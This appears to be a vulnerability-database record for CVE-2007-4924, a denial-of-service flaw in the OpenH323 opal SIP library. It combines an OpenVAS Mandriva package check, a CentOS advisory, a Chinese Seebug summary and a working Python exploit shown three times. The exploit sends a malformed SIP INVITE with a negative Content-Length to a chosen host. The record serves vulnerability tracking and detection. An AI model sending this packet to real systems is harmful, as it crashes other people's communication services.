Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-11/msg00002.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830308\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:00:25 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDKSA\", value: \"2007:205\");\n script_cve_id(\"CVE-2007-4924\");\n script_name( \"Mandriva Update for opal MDKSA-2007:205 (opal)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of opal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopal2\", rpm:\"libopal2~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopal2-devel\", rpm:\"libopal2-devel~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opal\", rpm:\"opal~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2\", rpm:\"lib64opal2~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2-devel\", rpm:\"lib64opal2-devel~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopal2\", rpm:\"libopal2~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopal2-devel\", rpm:\"libopal2-devel~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opal\", rpm:\"opal~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2\", rpm:\"lib64opal2~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2-devel\", rpm:\"lib64opal2-devel~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:10:10", "bulletinFamily": "exploit", "description": "OpenH323 Opal SIP Protocol Remote Denial of Service Exploit. CVE-2007-4924. Dos exploit for windows platform", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "id": "EDB-ID:9240", "href": "https://www.exploit-db.com/exploits/9240/", "type": "exploitdb", "title": "OpenH323 Opal SIP Protocol Remote Denial of Service Exploit", "sourceData": "#!/usr/bin/env python\n#\n# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)\n#\n# opal228_dos.py by Jose Miguel Esparza\n# 2007-10-08 S21sec labs\n\nimport sys,socket\n\nif len(sys.argv) != 3:\n\tsys.exit(\"Usage: \" + sys.argv[0] + \" target_host target_port\\n\")\ntarget = sys.argv[1]\ntargetPort = int(sys.argv[2])\nmalformedRequest = \"INVITE sip:paco@192.168.1.134 SIP/2.0\\r\\n\"+\\\n\t\t \"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n\"+\\\n\t\t \"Contact:sip:pepe@192.168.1.133:5060\\r\\n\"+\\\n\t\t \"Content-Length:-40999990\\r\\n\"+\\\n\t\t \"Content-Type:application/sdp\\r\\n\"+\\\n\t\t \"CSeq:4321 INVITE\\r\\n\"+\\\n\t\t \"From:sip:pepe@192.168.1.133:5060;tag=a48s\\r\\n\"+\\\n\t\t \"Max-Forwards:70\\r\\n\"+\\\n \t\"To:sip:paco@micasa.com\\r\\n\"+\\\n \t\"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\\r\\n\\r\\n\"\t\t \n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.connect((target,targetPort))\ns.sendall(malformedRequest)\ns.close()\n\n# milw0rm.com [2009-07-24]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9240/"}], "seebug": [{"lastseen": "2017-11-19T21:56:34", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 25955\r\nCVE(CAN) ID: CVE-2007-4924\r\n\r\nOpenh323\u662f\u4e3a\u5f00\u53d1\u4f7f\u7528H.323\u534f\u8bae\u5728IP\u7f51\u4e0a\u8fdb\u884c\u591a\u5a92\u4f53\u901a\u4fe1\u7684\u5e94\u7528\u7a0b\u5e8f\u800c\u4e13\u95e8\u8bbe\u8ba1\u7684\u5168\u529f\u80fd\u534f\u8bae\u6808\u3002\r\n\r\nOpenh323\u7684\u5b9e\u73b0\u5728\u5904\u7406\u7578\u5f62\u683c\u5f0f\u7684SIP\u62a5\u6587\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u7528\u6237\u7684\u7cfb\u7edf\u5d29\u6e83\u3002\r\n\r\nOpenH323\u6240\u4f7f\u7528\u7684opal\u5e93\u7684sip/sippdu.cxx\u6587\u4ef6\u4e2dSIP_PDU::Read()\u65b9\u5f0f\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406SIP\u62a5\u6587\u5934\u4e2d\u7684Content-Length\u5b57\u6bb5\uff0c\u5982\u679c\u8fdc\u7a0b\u653b\u51fb\u8005\u5411\u4f7f\u7528\u4e86\u8be5\u5e93\u7684\u5e94\u7528\u7a0b\u5e8f\u53d1\u9001\u4e86\u7578\u5f62\u7684SIP\u62a5\u6587\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5411\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u5199\u5165\u201c\\0\u201d\u5b57\u8282\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\r\n\n\nOpenH323 Opal 2.2.4\r\nEkiga Ekiga < 2.0.10\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpenH323\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&r2=2.83.2.20\" target=\"_blank\">http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&r2=2.83.2.20</a>\r\n\r\nEkiga\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://mail.gnome.org/archives/ekiga-list/2007-September/msg00103.html\" target=\"_blank\">http://mail.gnome.org/archives/ekiga-list/2007-September/msg00103.html</a>", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2279", "id": "SSV:2279", "type": "seebug", "title": "OpenH323 Opal\u5e93SIP\u534f\u8bae\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:42:50", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12762", "id": "SSV:12762", "type": "seebug", "title": "OpenH323 Opal SIP Protocol Remote Denial of Service Exploit", "sourceData": "\n #!/usr/bin/env python\n#\n# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)\n#\n# opal228_dos.py by Jose Miguel Esparza\n# 2007-10-08 S21sec labs\n\nimport sys,socket\n\nif len(sys.argv) != 3:\n\tsys.exit("Usage: " + sys.argv[0] + " target_host target_port\\n")\ntarget = sys.argv[1]\ntargetPort = int(sys.argv[2])\nmalformedRequest = "INVITE sip:paco@192.168.1.134 SIP/2.0\\r\\n"+\\\n\t\t "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n"+\\\n\t\t "Contact:sip:pepe@192.168.1.133:5060\\r\\n"+\\\n\t\t "Content-Length:-40999990\\r\\n"+\\\n\t\t "Content-Type:application/sdp\\r\\n"+\\\n\t\t "CSeq:4321 INVITE\\r\\n"+\\\n\t\t "From:sip:pepe@192.168.1.133:5060;tag=a48s\\r\\n"+\\\n\t\t "Max-Forwards:70\\r\\n"+\\\n \t"To:sip:paco@micasa.com\\r\\n"+\\\n \t"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\\r\\n\\r\\n"\t\t \n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.connect((target,targetPort))\ns.sendall(malformedRequest)\ns.close()\n\n# sebug.net\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12762", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:19", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "href": "https://packetstormsecurity.com/files/79577/OpenH323-Opal-SIP-Denial-Of-Service.html", "id": "PACKETSTORM:79577", "type": "packetstorm", "title": "OpenH323 Opal SIP Denial Of Service", "sourceData": "`#!/usr/bin/env python \n# \n# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924) \n# \n# opal228_dos.py by Jose Miguel Esparza \n# 2007-10-08 S21sec labs \n \nimport sys,socket \n \nif len(sys.argv) != 3: \nsys.exit(\"Usage: \" + sys.argv[0] + \" target_host target_port\\n\") \ntarget = sys.argv[1] \ntargetPort = int(sys.argv[2]) \nmalformedRequest = \"INVITE sip:paco@192.168.1.134 SIP/2.0\\r\\n\"+\\ \n\"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n\"+\\ \n\"Contact:sip:pepe@192.168.1.133:5060\\r\\n\"+\\ \n\"Content-Length:-40999990\\r\\n\"+\\ \n\"Content-Type:application/sdp\\r\\n\"+\\ \n\"CSeq:4321 INVITE\\r\\n\"+\\ \n\"From:sip:pepe@192.168.1.133:5060;tag=a48s\\r\\n\"+\\ \n\"Max-Forwards:70\\r\\n\"+\\ \n\"To:sip:paco@micasa.com\\r\\n\"+\\ \n\"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\\r\\n\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.connect((target,targetPort)) \ns.sendall(malformedRequest) \ns.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/79577/opal228_dos.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:45:48", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0957\n\n\nOpen Phone Abstraction Library (opal) is implementation of various\r\ntelephony and video communication protocols for use over packet based \r\nnetworks.\r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\r\n\r\nA flaw was discovered in the way opal handled certain Session Initiation \r\nProtocol (SIP) packets. An attacker could use this flaw to crash an \r\napplication, such as Ekiga, which is linked with opal. (CVE-2007-4924)\r\n\r\nUsers should upgrade to these updated opal packages which contain a \r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/014290.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/014291.html\n\n**Affected packages:**\nopal\nopal-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0957.html", "modified": "2007-10-09T23:45:03", "published": "2007-10-09T23:45:03", "href": "http://lists.centos.org/pipermail/centos-announce/2007-October/014290.html", "id": "CESA-2007:0957", "title": "opal security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}